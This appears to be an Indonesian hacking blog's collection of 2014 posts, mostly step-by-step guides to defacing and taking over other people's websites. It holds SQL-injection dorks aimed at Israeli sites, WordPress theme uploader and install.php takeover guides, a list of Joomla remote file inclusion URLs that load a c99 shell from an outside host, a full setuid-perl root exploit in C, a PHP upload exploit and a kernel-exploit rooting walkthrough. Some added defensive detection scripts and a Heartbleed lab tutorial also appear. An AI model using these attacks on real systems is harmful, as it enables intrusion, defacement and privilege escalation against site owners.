Thursday, 17 July 2014

Tutorial: Installing sqlmap on a VPS

    
     
Hi! It has been a while since I posted anything; I took a short break and now I am back. This time I will share how to install sqlmap on a VPS.
What you need:
- A PC connected to the Internet
- PuTTY for Windows
- A VPS account
Steps:
1. Open PuTTY and enter the IP address of your VPS.
2. Type "sudo apt-get install git" (Debian/Ubuntu). If that does not work, use "yum install git" (RHEL/CentOS).
3. Type "git clone https://github.com/sqlmapproject/sqlmap.git", press Enter and wait a moment.
4. When the clone has finished, type "cd sqlmap".
5. Run it with "./sqlmap.py" or "python sqlmap.py".
Watch the video for a walkthrough.

SQL Injection Dorks for Israeli Websites

Dorks (each one is a database or scripting error message; a site that prints it is echoing errors to its visitors, which is what makes it a candidate for error-based SQL injection):
intext:"error in your SQL syntax" +site:il

intext:"mysql_num_rows()" +site:il

intext:"mysql_fetch_array()" +site:il

intext:"Error Occurred While Processing Request" +site:il

intext:"Server Error in '/' Application" +site:il

intext:"Microsoft OLE DB Provider for ODBC Drivers error" +site:il

intext:"Invalid Querystring" +site:il

intext:"OLE DB Provider for ODBC" +site:il

intext:"VBScript Runtime" +site:il

intext:"ADODB.Field" +site:il

intext:"BOF or EOF" +site:il

intext:"ADODB.Command" +site:il

intext:"JET Database" +site:il

intext:"mysql_fetch_row()" +site:il

intext:"Syntax error" +site:il

intext:"include()" +site:il

intext:"mysql_fetch_assoc()" +site:il

intext:"mysql_fetch_object()" +site:il

intext:"mysql_numrows()" +site:il

intext:"GetArray()" +site:il

intext:"FetchRow()" +site:il

intext:"Input string was not in a correct format" +site:il

Defacing with OptimizePress

What you need:
- A shell (any web shell will do)
- A computer (connected to the Internet :D)

Steps:

1) Open Google.com and search for the following dork
Dork: inurl:/wp-content/themes/OptimizePress/

2) Once you have found a site,
3) append the exploit path: /wp-content/themes/OptimizePress/lib/admin/media-upload.php
4) If it works, a page like the one below appears (the uploader loads without any login)

5) Scroll down; there is an uploader, upload your shell there =))
6) If it succeeds, your shell's file name is shown. For example, my shell was called b.php

7) The shell is located at http://site/wp-content/uploads/optpress/images_comingsoon/yourshell.php
For example: http://site/wp-content/uploads/optpress/images_comingsoon//2013121101-39-39b.php
(the uploader prefixes the name with a timestamp, as in this example)

Defacing Ad-Listing Sites

The only tool you need is Live HTTP Headers; download it HERE, or you can use THIS one instead.
Dork: intext:pasang iklan gratis ("pasang iklan gratis" means "place a free ad"; use your brain to vary it :D)
Prepare your shell and rename it to look like an image,
for example shell.php.jpg

Find a site and add /banner/pasang to the URL,
e.g. www.site.com/banner/pasang

Once you have found one, go to the "place a banner ad" page,
fill the form with whatever data you like,
and in the upload field select the renamed shell.

Submit the ad. The tamper window will then pop up; edit the request data there:
find the file name shell.php.jpg and change it back to shell.php.

The check in the browser only ever saw a .jpg; the server stores the file under whatever name the request carries.

And tadaa, your shell is on the site. By default it lands in target.com/images/bnrs/(shellname).php, though that depends on how the site is configured.

The rest is up to you.

Collection of Joomla Exploits

All of these are remote file inclusion bugs in old Mambo/Joomla components: the component builds an include path from a variable such as mosConfig_absolute_path, mosConfig_live_site, absolute_path, phpbb_root_path or sbp without checking that the framework set it, so with register_globals on you can supply it in the query string and make the script include a URL instead. http://hostingan.com/sh3LL/c99.txt stands for a shell hosted on your own server; the trailing ? turns whatever the script appends to the path into a query string.

Google dork:
inurl:"com_joomlaboard"
Exploit: /components/com_joomlaboard/file_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
Exploit: /components/com_joomlaboard/image_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
Google dork:
inurl:"com_admin"
Exploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_simpleboard
Exploit: /components/com_simpleboard/file_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
Google dork:
inurl:"com_hashcash"
Exploit: /components/com_hashcash/server.php?mosConfig_absolute_path=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
Google dork:
inurl:"com_sitemap"
Exploit: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_forum"
Exploit: /components/com_forum/download.php?phpbb_root_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_pccookbook"
Exploit: /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_extcalendar
Exploit: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"minibb"
Exploit: /components/minibb/index.php?absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_smf"
Exploit: /components/com_smf/smf.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
Exploit: /modules/mod_calendar.php?absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_pollxt"
Exploit: /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_loudmounth"
Exploit: /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_videodb"
Exploit: /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_pcchess
Exploit: /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_multibanners"
Exploit: /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_a6mambohelpdesk"
Exploit: /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_colophon"
Exploit: /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_mgm"
Exploit: /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_mambatstaff"
Exploit: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_securityimages"
Exploit: /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
Exploit: /components/com_securityimages/lang.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_artlinks"
Exploit: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_galleria"
Exploit: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_zoom"
Exploit: /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
Exploit: /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_serverstat"
Exploit: /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
Exploit: /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"mambo"
Exploit: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
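On the defending side these requests are easy to pick out of an access log. The following is an added example (not from the post): it parses Apache combined-format lines and flags query parameters whose value is a remote URL, keyed on the include-path variable names from the list above. The log lines are constructed, with RFC 5737 addresses.

```python
"""Spotting remote-file-inclusion attempts in web server logs (added example; not from the post)."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Include-path variables abused by the exploits above; with register_globals on, a query-string
# value lands straight in them.
RFI_PARAMS = {"mosConfig_absolute_path", "mosConfig_live_site", "absolute_path",
              "phpbb_root_path", "sbp"}
REMOTE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
COMBINED = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                      r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')


def parse_combined(line):
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def rfi_findings(line):
    """One dict per parameter whose value is a remote URL and which either is a known include-path
    variable or ends in .txt (a shell served as plain text, the c99.txt pattern above)."""
    rec = parse_combined(line)
    if rec is None:
        return []
    out = []
    for name, value in parse_qsl(urlsplit(rec["uri"]).query, keep_blank_values=True):
        value = unquote(value)          # second pass catches double-encoded payloads
        if REMOTE.match(value) and (name in RFI_PARAMS or value.rstrip("?").lower().endswith(".txt")):
            out.append({"ip": rec["ip"], "time": rec["time"], "param": name, "url": value,
                        "status": int(rec["status"])})
    return out


def scan_log(text):
    return [f for line in text.splitlines() for f in rfi_findings(line)]


# Constructed log lines: one normal request, two RFI attempts (the second percent-encoded),
# and a local path, which this check deliberately ignores.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Jul/2014:10:12:01 +0700] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 5120
203.0.113.5 - - [17/Jul/2014:10:12:07 +0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt? HTTP/1.1" 200 48213
198.51.100.9 - - [17/Jul/2014:10:13:44 +0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http%3A%2F%2Fhostingan.com%2Fsh3LL%3F%3F HTTP/1.0" 500 0
198.51.100.9 - - [17/Jul/2014:10:14:02 +0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=/var/www HTTP/1.1" 404 210
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:15s} {f['status']} {f['param']}={f['url']}")
```

A 200 with a large response body after a remote include (the second line) is the one to look at first; a 500 may just mean allow_url_include was off. Local values such as /var/www are left out here on purpose, since they are a local-file-inclusion question with different signatures.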

Root Exploit


The exploit looks like this:
/*
* Copyright Kevin Finisterre
*
* ** DISCLAIMER ** I am in no way responsible for your stupidity.
* ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code.
*
* ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
* ** WARNING ** overwriting /etc/ld.so.preload can severly fuck up your box (or someone elses).
* ** WARNING ** have a boot disk ready incase some thing goes wrong.
*
* Setuid Perl exploit by KF – kf_lists[at]secnetops[dot]com – 1/30/05
*
* this exploits a vulnerability in the PERLIO_DEBUG functionality
* tested against sperl5.8.4 on Debian
*
* kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c
* kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
* ls: /etc/ld.so.preload: No such file or directory
* kfinisterre@jdam:~$ ./ex_perl
* sperl needs fd script
* You should not call sperl directly; do you need to change a #! line
* from sperl to perl?
* kfinisterre@jdam:~$ su -
* jdam:~# id
* uid=0(root) gid=0(root) groups=0(root)
* jdam:~# rm /etc/ld.so.preload
*
*/
See that? The id is already root xD. Other local root exploits work along the same lines;
hehehe... go ahead and look for others.
#define PRELOAD "/etc/ld.so.preload"
#include <stdio.h>
#include <stdlib.h>     /* exit, system, putenv */
#include <strings.h>
#include <sys/stat.h>   /* umask */
int main(int argc, char **argv)
{
    /* 1. Build a shared object whose getuid() always answers 0 */
    FILE *getuid;
    if(!(getuid = fopen("/tmp/getuid.c","w+"))) {
        printf("error opening file\n");
        exit(1);
    }
    fprintf(getuid, "int getuid(){return 0;}\n" );
    fclose(getuid);
    system("cc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc");
    /* 2. Make setuid perl open /etc/ld.so.preload as its PERLIO_DEBUG log: it runs as root,
          and umask 001 leaves the new file writable by everyone (rw-rw-rw-) */
    putenv("PERLIO_DEBUG="PRELOAD);
    umask(001); // I'm rw-rw-rw james bitch!
    system("/usr/bin/sperl5.8.4");
    /* 3. Now that anyone can write it, point the loader at our getuid.so for every program */
    FILE *ld_so_preload;
    char preload[] = {
        "/tmp/getuid.so\n"
    };
    if(!(ld_so_preload = fopen(PRELOAD,"w+"))) {
        printf("error opening file\n");
        exit(1);
    }
    fwrite(preload,sizeof(preload)-1,1,ld_so_preload);
    fclose(ld_so_preload);
    return 0;
}
Quoted from http://www.k-otik.com/exploits/20050207.ex_perl.c.php
To recover a box this has been run on:
1. Boot from Knoppix or another Linux rescue disc.
2. Find the file /etc/ld.so.preload.
3. It will contain the line /tmp/getuid.so.
4. If the file is there, just delete it; do not hesitate.
5. Boot from the hard disk again. No reinstall is needed.
How the exploit works: PERLIO_DEBUG makes the setuid perl binary create /etc/ld.so.preload as its debug log, as root, with a permissive umask so that anyone can write to it; the exploit then writes /tmp/getuid.so into it, so every dynamically linked program (su included) preloads a getuid() that always returns 0. After a reboot /tmp is usually cleaned, so on every program start the loader looks for /tmp/getuid.so, which no longer exists. So be careful with this exploit if you do not want to end up confused.
Thanks to all the friends who helped me out :) :D
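The cleanup steps above come down to one question: does /etc/ld.so.preload point the loader at something in a user-writable directory, and is the file itself writable by non-root? The following is an added example (not part of the original post or the exploit) that answers it. The content and mode bits in the test are constructed, and the existence check is injectable so the same code can run from rescue media against a mounted root.

```python
"""Triage for /etc/ld.so.preload abuse (added example; not from the post or the exploit)."""
import os
import stat

PRELOAD = "/etc/ld.so.preload"
# A preload entry under one of these is the tell-tale; legitimate ones live under /lib or /usr/lib.
SUSPECT_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def _is_suspicious(entry, exists):
    """Entry points into a user-writable directory, or at an object that is no longer there."""
    return entry.startswith(SUSPECT_PREFIXES) or not exists(entry)


def audit_preload(content, mode=None, exists=os.path.exists):
    """Return [(finding, detail)] for the text of ld.so.preload.

    content: the file's text; mode: its st_mode if known; exists: path -> bool, injectable so
    the check can run against a mounted image or, as in the test, constructed data."""
    findings = []
    if mode is not None and mode & (stat.S_IWGRP | stat.S_IWOTH):
        # The exploit relies on exactly this: sperl created the file under umask 001 -> rw-rw-rw-
        findings.append(("writable_by_non_root", oct(stat.S_IMODE(mode))))
    for lineno, raw in enumerate(content.splitlines(), 1):
        entry = raw.strip()
        if not entry or entry.startswith("#"):
            continue
        if entry.startswith(SUSPECT_PREFIXES):
            findings.append(("preload_from_user_writable_dir", f"line {lineno}: {entry}"))
        if not exists(entry):
            # After a reboot /tmp is cleaned; the loader then fails this entry on every exec
            findings.append(("missing_object", f"line {lineno}: {entry}"))
    return findings


def remediate(content, exists=os.path.exists):
    """Drop the suspicious entries. An empty result means the file should simply be removed,
    which is what the recovery steps above do."""
    keep = [e for e in (raw.strip() for raw in content.splitlines())
            if e and not e.startswith("#") and not _is_suspicious(e, exists)]
    return "\n".join(keep) + ("\n" if keep else "")


def audit_system(root="/"):
    """Run on a live system, or on a mounted root (root='/mnt/sysimage' from rescue media)."""
    path = os.path.join(root, PRELOAD.lstrip("/"))
    if not os.path.exists(path):
        return []                          # no preload file at all: the normal state
    with open(path) as fh:
        content = fh.read()
    in_root = lambda p: os.path.exists(os.path.join(root, p.lstrip("/")))
    return audit_preload(content, os.stat(path).st_mode, exists=in_root)


if __name__ == "__main__":
    # Constructed: what the exploit above leaves behind, after /tmp has been cleaned
    infected = "/tmp/getuid.so\n"
    for finding in audit_preload(infected, mode=0o100666, exists=lambda p: False):
        print(*finding)
```

On a live box the hooked getuid() only lies to programs that ask who they are, so reading the file from a script works fine; the reason to do it from rescue media, as the post says, is that you cannot trust su or sudo on the infected system.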

Admin Finder [PYTHON SCRIPT]

Hello friends :D
This time I am sharing a tool for finding the admin login page of a website :D Knowing the admin's username and password is useless if you do not know where the admin login page is :D

Before using adminfinder.py, make sure Python is installed on your PC. If it is not, download it here:
-Download Python

Ready? Grab it here:
-Download Admin Finder [PYTHON SCRIPT]

Admin Finder (screenshot)

Thanks for visiting ^_^ do not forget to leave a comment ^_^
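The linked adminfinder.py is not reproduced here. As an added example (my code, not the script from the post) this is the core of such a tool with the one check naive finders lack: a baseline fetched for a random non-existent path, so a site that answers 200 to everything does not turn every guess into a hit. fake_site is a constructed target so the example runs offline; http_fetch is the real fetcher for authorised tests. The path list and the example.test host are assumptions.

```python
"""Admin-page discovery with a soft-404 baseline (added example; not the adminfinder.py linked above)."""
import difflib
import random
import string
from urllib.parse import urljoin, urlsplit

# A short built-in list; a real run would load a wordlist.
COMMON_ADMIN_PATHS = ["admin/", "admin/login.php", "administrator/", "wp-login.php",
                      "wp-admin/", "login.php", "admin.php", "cpanel/", "user/login", "manager/"]


def random_path():
    """A path that certainly does not exist, to learn what this site says for 'not found'."""
    return "".join(random.choices(string.ascii_lowercase, k=12)) + "/"


def normalise(body, path):
    """Soft-404 pages usually echo the requested path; strip it so two of them compare equal."""
    return body.replace(path, "").replace(path.rstrip("/"), "")


def looks_like_baseline(body, path, baseline, threshold=0.9):
    return difflib.SequenceMatcher(None, normalise(body, path), baseline).ratio() >= threshold


def find_admin_pages(base_url, fetch, paths=COMMON_ADMIN_PATHS):
    """fetch(url) -> (status, body). Status codes alone are not enough: a catch-all 200 page
    would make every guess a hit, so anything resembling the random-path response is ignored."""
    probe = random_path()
    _, baseline = fetch(urljoin(base_url, probe))
    baseline = normalise(baseline, probe)
    hits = []
    for p in paths:
        status, body = fetch(urljoin(base_url, p))
        if status in (401, 403):
            hits.append((p, status, "exists, access denied"))
        elif 200 <= status < 300 and not looks_like_baseline(body, p, baseline):
            hits.append((p, status, "distinct page"))
    return hits


def http_fetch(url, timeout=10):
    """Real fetcher for authorised tests; urllib raises on 4xx/5xx, so catch and return the code."""
    import urllib.error
    import urllib.request
    try:
        with urllib.request.urlopen(url, timeout=timeout) as r:
            return r.status, r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


def fake_site(url):
    """Constructed target: a catch-all 200 'not found' page, one real login form, one 403."""
    path = urlsplit(url).path.lstrip("/")
    if path == "wp-login.php":
        return 200, ('<html><body><form name="loginform" action="wp-login.php" method="post">'
                     '<input name="log"><input name="pwd" type="password"></form></body></html>')
    if path == "administrator/":
        return 403, "<html><body><h1>Forbidden</h1></body></html>"
    return 200, f"<html><body><h1>Sorry, /{path} was not found</h1><p>Try the home page.</p></body></html>"


if __name__ == "__main__":
    for hit in find_admin_pages("http://example.test/", fake_site):
        print(hit)
```

Swap fake_site for http_fetch to run it for real, and keep the rule from the Heartbleed post below in mind: only against sites you have permission to test.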

PACKETSTORM DATABASE

  • 16 July 2014: Oracle Data Redaction Is Broken
    Oracle data redaction is a simple but clever and innovative idea from Oracle. However, at present, there are weaknesses that undermine its effectiveness as a good security mechanism. These weaknesses can be exploited via web based SQL injection attacks and this paper details those weaknesses and provides suggestions on how it can be improved and made more secure.
  • 16 July 2014: pyClamd 0.3.10
    pyClamd is a python interface to Clamd (Clamav daemon). By using pyClamd, you can add virus detection capabilities to your python software in an efficient and easy way. Instead of pyClamav which uses libclamav, pyClamd may be used by a closed source product.
  • 16 July 2014: Bitdefender GravityZone File Disclosure / Missing Authentication
    Bitdefender GravityZone versions prior to 5.1.11.432 suffer from local file disclosure, insecure service configuration, and missing authentication vulnerabilities.
  • 16 July 2014: Microsoft Windows DirectShow Privilege Escalation
    VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Windows. The vulnerability is caused by an input validation error in DirectShow when processing and unserializing "Stretch" objects in memory, which could be exploited to elevate privileges and execute arbitrary code in the context of the logged on user, or e.g. bypass Internet Explorer's Enhanced Protected Mode (EPM) sandbox.
  • 16 July 2014: e107 2.0 alpha2 Cross Site Scripting
    e107 version 2.0 alpha2 suffers from a reflective cross site scripting vulnerability.
  • 16 July 2014: Citrix Netscaler Disclosure / Cross Site Scripting
    Citrix NetScaler Application Delivery Controller and Citrix NetScaler Gateway are susceptible to cookie disclosure and reflective cross site scripting vulnerabilities.
  • 16 July 2014: Microsoft Internet Explorer ShowSaveFileDialog() Sandbox Bypass
    VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Internet Explorer. The vulnerability is caused due to an invalid handling of a sequence of actions aimed to save a file when calling "ShowSaveFileDialog()", which could be exploited by a sandboxed process to write files to arbitrary locations on the system and bypass IE Protected Mode sandbox. Versions 8, 9, 10, and 11 are affected.
  • 16 July 2014: OpenVPN Access Server Arbitrary Code Execution
    Remote attackers can execute arbitrary code and execute other attacks on computers with the OpenVPN Access Server "Desktop Client" installed.
  • 16 July 2014: Microsoft Internet Explorer Request Object Confusion Sandbox Bypass
    VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Internet Explorer. The vulnerability is caused by an object confusion vulnerability when processing object types within data shared between the broker and sandboxed processes, which could be exploited by a sandboxed process to achieve code execution within the broker context and bypass IE Protected Mode sandbox. Versions 8, 9, 10, and 11 are affected.
  • 16 July 2014: Microsoft Internet Explorer CSS @import Memory Corruption
    VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Internet Explorer. The vulnerability is caused by a use-after-free vulnerability when manipulating CSS @import statements through "addImport()" or "removeImport()", which could be exploited by attackers to leak arbitrary memory or execute arbitrary code via a malicious web page. Versions 9, 10, and 11 are affected.
  • 16 July 2014: Alfresco Community Edition 4.2.f Server Side Request Forgery
    Alfresco Community Edition versions 4.2.f and below suffer from multiple server side request forgery vulnerabilities.
  • 16 July 2014: HP Security Bulletin HPSBMU03072 SSRT101644
    HP Security Bulletin HPSBMU03072 SSRT101644 - A potential security vulnerability has been identified with HP Data Protector. This vulnerability could be remotely exploited to execute arbitrary code. Revision 1 of this advisory.
  • 16 July 2014: Ubuntu Security Notice USN-2280-1
    Ubuntu Security Notice 2280-1 - It was discovered that MiniUPnPc incorrectly handled certain buffer lengths. A remote attacker could possibly use this issue to cause applications using MiniUPnPc to crash, resulting in a denial of service.
  • 16 July 2014: Ubuntu Security Notice USN-2279-1
    Ubuntu Security Notice 2279-1 - Ben Hawkes discovered that Transmission incorrectly handled certain peer messages. A remote attacker could use this issue to cause a denial of service, or possibly execute arbitrary code.
  • 16 July 2014: Red Hat Security Advisory 2014-0889-01
    Red Hat Security Advisory 2014-0889-01 - The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit. It was discovered that the Hotspot component in OpenJDK did not properly verify bytecode from the class files. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions. A format string flaw was discovered in the Hotspot component event logger in OpenJDK. An untrusted Java application or applet could use this flaw to crash the Java Virtual Machine or, potentially, execute arbitrary code with the privileges of the Java Virtual Machine.


Friday, 30 May 2014

Detecting OpenSSL-Heartbleed with Nmap & Exploiting with Metasploit

You can now quickly detect the OpenSSL Heartbleed vulnerability across a network using the ever popular nmap command, and with the latest modules from Metasploit you can see the exploit in action.
For this tutorial I will be using a WordPress server and Kali Linux running in two separate VMware virtual machines.
For a vulnerable server, I used one of Turnkey Linux's WordPress VMs. There are security updates available for Turnkey's WordPress, but during the VM setup, and for this tutorial, I purposely told the VM NOT to install the security updates so I could test for the OpenSSL vulnerability.
Once the WordPress VM was configured (just answer a few simple questions) I fired up my Kali Linux VM.
Nmap has an ssl-heartbleed script that does a great job of detecting vulnerable servers. The script may not be included in your version of Kali, so you may have to install it manually.

Detecting Exploit with Nmap

If the ssl-heartbleed script is not already included in your nmap install, you will need to install it manually.
This is pretty easy: visit the ssl-heartbleed nmap script page, then copy and save the .nse script file into your nmap "scripts" directory, as seen below:
(screenshot: saving the ssl-heartbleed script into the nmap scripts directory)
You will also need the nmap "tls.lua" library file; save it into the nmap "nselib" directory, as seen below:
(screenshot: tls.lua saved into the nselib directory)
That is it; we can now use the ssl-heartbleed script in nmap to detect vulnerable systems.
The syntax is:
nmap -sV --script=ssl-heartbleed <target>
All we need to plug in is the IP address of our target test WordPress site, 192.168.1.70 in this instance:
(screenshot: nmap -sV --script=ssl-heartbleed 192.168.1.70)
And if the target machine is vulnerable we will see this:
(screenshot: nmap script output reporting the host vulnerable)
State: VULNERABLE Risk Factor: High

Exploiting with Metasploit

Now that we know we have a vulnerable server, we can use the latest Metasploit OpenSSL Heartbleed module against it. (Note: you can use the module to detect vulnerable systems as well.)
Update Metasploit to get the latest modules. Just type "msfupdate" at a Kali command prompt:
msfupdate
Now run "msfconsole" to start Metasploit and you will be presented with the Metasploit console:
(screenshot: Metasploit prompt)
Next, search for the heartbleed modules:
(screenshot: heartbleed search results)
Notice there are two; we will just be using the scanner.
Type "use auxiliary/scanner/ssl/openssl_heartbleed":
(screenshot: the openssl_heartbleed module loaded)
We are just going to set two options: "set VERBOSE true", and "set RHOSTS" to our target IP address, as seen below:
(screenshot: VERBOSE and RHOSTS set)
And finally, just type "run":
(screenshot: leaked heartbeat data)
In the screenshot you can see that Metasploit communicated with the server and was able to pull random data from the server's memory.
The important thing to note here is that it pulls whatever happens to be in the process's memory. There is no guarantee that you will find account credentials, session cookies or other critical data every time you run this. The danger is that it can display sensitive data.
Thus the best practice (if you have not already) is to check your systems for the Heartbleed vulnerability and patch them immediately. After the systems are patched, change any passwords on the affected machines and reissue certificates whose private keys could have been exposed.
As always, never run security scans or checks on systems that you do not own or have approval to scan.
If you enjoyed this tutorial and want to learn more about Kali Linux and Metasploit, check out my latest book on Amazon, "Basic Security Testing with Kali Linux".

Thursday, 29 May 2014

Tutorial: Rooting a Server



OK, this time I will share a tutorial on rooting a server hehehe. The tutorial is a bit messy; bear with me, I am a newbie xixixi :D :D

What you need:

- A VPS
- PuTTY for Windows
- A website where you already have a shell
- A kernel exploit :D

Steps:

1. Back-connect first; for a back-connect tutorial watch > here <



2. Once the back-connect is up, the kernel version is shown. Search Google for
  ~> Exploit Kernel [the web server's kernel version], for example:
  ~> Exploit Kernel 2.6.32



3. Once you have found one, upload the exploit to the website.


4. Back in PuTTY, make it executable:
  ~> "chmod +x filename"
  ("chmod 777 filename" also works, but it is more than needed and makes the file world-writable)


5. Execute it with "./filename", for example "./xxx"



6. Type id. If you get
  ~> uid=0(root) gid=0(root) groups=0(root) it worked. If it errors out, the exploit does not match the kernel :D


Not clear? Watch the video.

Monday, 14 April 2014

DEFACING WORDPRESS WITH THE WP-INSTALL TECHNIQUE

Once that is done, type /wp-admin/install.php into the search form. You can add Country:ID (Indonesia) / MY (Malaysia) / any other country.

HACK WORDPRESS (screenshot)




Pick the results that say HTTP/1.0 302 Found. You surely know already why it has to be HTTP/1.0 302 Found and not HTTP/1.0 302 Moved Temporarily:
because Found means it was found. That is all the explanation you get; the point is to pick Found. (Both carry status code 302; only the reason phrase differs.)



Next, fill in the form, which asks for:

Site Title
Username
Password



as in the picture below:

TADAA... FINISHED! Big Grin Now go change the tagline/title so it gets INDEXED BY GOOGLE Big Grin



============================================================================

NOTE:
IF YOU GET THIS (CHECK THE PICTURE BELOW),
IT CANNOT BE DONE; JUST MOVE ON AND LOOK FOR ANOTHER ONE, BECAUSE THE OWNER HAS ALREADY INSTALLED IT, OR SOMEONE ELSE READING THIS TUTORIAL GOT THERE FIRST
HACK WORDPRESS (screenshot)


HACK WORDPRESS (screenshot)

Defacing with the WP-Store Theme Uploader

Steps:
1. Find targets with these Google dorks:
inurl:/wp-content/themes/eShop/
inurl:/wp-content/themes/WPStore/
inurl:/wp-content/themes/Store/
*You can append a site: element to the dork,
e.g. site:co.uk, etc.

2. Once you have a target, use this exploit path:
/wp-content/themes/WPStore/upload/
e.g. site.com/wp-content/themes/eShop/style.css
becomes
site.com/wp-content/themes/WPStore/upload/



3. When the page shown above appears, upload your shell or a deface script in .html form.
4. When that is done, append wp-content/uploads/products_img/shellname.php to the target's address.
e.g. site.com/wp-content/themes/WPStore/upload/
becomes
site.com/wp-content/uploads/products_img/shellname.php
*replace shellname with the name of your shell.
*if you get 404 not found, the site will not take a shell; try uploading a deface script instead.
5. Once you are in the shell, overwrite index.php, not index.html.

Copied by: scupe.id

Tutorial: Defacing via the Magnitudo Theme Arbitrary File Upload Vulnerability

Google dork: inurl:wp-content/themes/magnitudo
Use your brain to come up with other dorks :)

Exploit:

<?php
// Target: the theme's valums uploader script on the site found with the dork (see the path below)
$url = "http://www.site.com/wordpress/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php";
// Local file to upload; replace with the name of your shell (see below)
$uploadfile = "shell.php";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
// qqfile is the field name the valums uploader reads; the @ prefix makes cURL send the file's contents
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

First, download XAMPP HERE HERE

Once it is installed, find php.ini at C:\xampp\php\php.ini

Press Ctrl+F and search for "curl" (without the quotes); when you find the line, remove the semicolon ( ; ) in front of it and save.

Now copy the exploit and save it with a .php extension

in the folder xampp -> php.

Second, copy your shell into the same xampp -> php folder.

If your shell is called x.php, change the shell name in the exploit:

